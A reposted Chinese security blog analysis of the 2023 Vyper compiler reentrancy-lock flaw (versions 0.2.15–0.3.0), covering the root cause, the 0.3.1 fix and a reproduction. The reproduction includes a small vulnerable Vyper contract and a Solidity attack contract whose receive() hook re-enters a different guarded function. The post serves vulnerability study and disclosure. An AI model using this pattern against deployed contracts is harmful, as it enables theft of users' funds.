Vyper 智能合约重入锁防御失效漏洞分析

admin
admin
admin
103118
文章
87
评论
2023年8月1日12:57:22评论73 views字数 1418阅读4分43秒阅读模式

事件背景

2023年7月31日0点左右,vyper官方提醒,0.2.15, 0.2.16和0.3.0的vyper的重入锁有漏洞。目前,由此漏洞造成的损失已超过7000万美元,受影响的项目包括Curve、Alchemix 和 JPEG'd。
Vyper 智能合约重入锁防御失效漏洞分析

原因分析

生成外部函数的ir的函数:
Vyper 智能合约重入锁防御失效漏洞分析
调用get_nonreentrant_lock函数获取检查重入锁:
Vyper 智能合约重入锁防御失效漏洞分析
这部分的逻辑是首先查看该函数是否是重入保护函数,如果是的话获取存储重入flag的slot的位置。
check_notset = ["assert", ["ne", temp_value, [LOAD, nkey]]] 这个语句的意思是使用load指令读取重入flag的slot,将值存入临时变量中,并断言这个值是否为真。
set_data_positions 函数的功能是设置一个合约中所有变量在slot中的位置
Vyper 智能合约重入锁防御失效漏洞分析
Vyper 智能合约重入锁防御失效漏洞分析
在第一个for循环中,遍历一个合约中的所有函数,node是一个函数定义结点,如果函数定义中有nonreentrant装饰器,则调用set_reentrancy_key_position设置重入锁flag的slot位置:
Vyper 智能合约重入锁防御失效漏洞分析
问题的关键是一个合约中可能有多个函数使用nonreentrant装饰器,这里相当于给每一个函数都分配了一个重入锁flag。
如果重入的自身的函数,那没有问题,因为访问的是同一个重入锁flag,但如果重入调用的是其他函数,这时候访问的是这个被调用函数的slot,这时的flag还是初始状态,所以可以绕过重入锁。

官方修复

在0.3.1版本的set_storage_slots函数中,对整个合约只设置一个重入锁flag的slot:
Vyper 智能合约重入锁防御失效漏洞分析
有意思的是,官方认为这只是一个优化上的小问题,因为旧版版会占用更多的slot,而没意识到这将导致严重的安全问题:
Vyper 智能合约重入锁防御失效漏洞分析

漏洞复现

首先安装0.2.15版本的vyper:
Vyper 智能合约重入锁防御失效漏洞分析
被攻击的vyper合约:
@nonreentrant("lock")
@external
def a(contract: address):
    value: uint256 = 0
    raw_call(contract, b"",value=value)

@nonreentrant("lock")
@external
def b():
    pass
两个函数都是用nonreentrant装饰器。
攻击合约:
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.13;

import "./Itest.sol";

contract Exp{
    Itest public test;
    uint256 public times;

    constructor(address _test) {
        test = Itest(_test);
    }

    function go() public {
        test.a(address(this));
    }

    receive () external payable { 
        if (times == 0) {
            times++;
            // test.b();
            test.a(address(0));
        }
    }
}
首先测试重入a函数,即重新调用本身的函数,调用失败:
Vyper 智能合约重入锁防御失效漏洞分析
接着测试调用b函数,此时调用成功,说明漏洞存在:
Vyper 智能合约重入锁防御失效漏洞分析
升级vyper到0.3.1:
Vyper 智能合约重入锁防御失效漏洞分析
这时就无法在a函数中调用b函数:
Vyper 智能合约重入锁防御失效漏洞分析
复现链接:

https://github.com/wangbar0133/vyper_0215


原文始发于微信公众号(山石网科安全技术研究院):Vyper 智能合约重入锁防御失效漏洞分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月1日12:57:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vyper 智能合约重入锁防御失效漏洞分析https://cn-sec.com/archives/1925281.html

发表评论

匿名网友 填写信息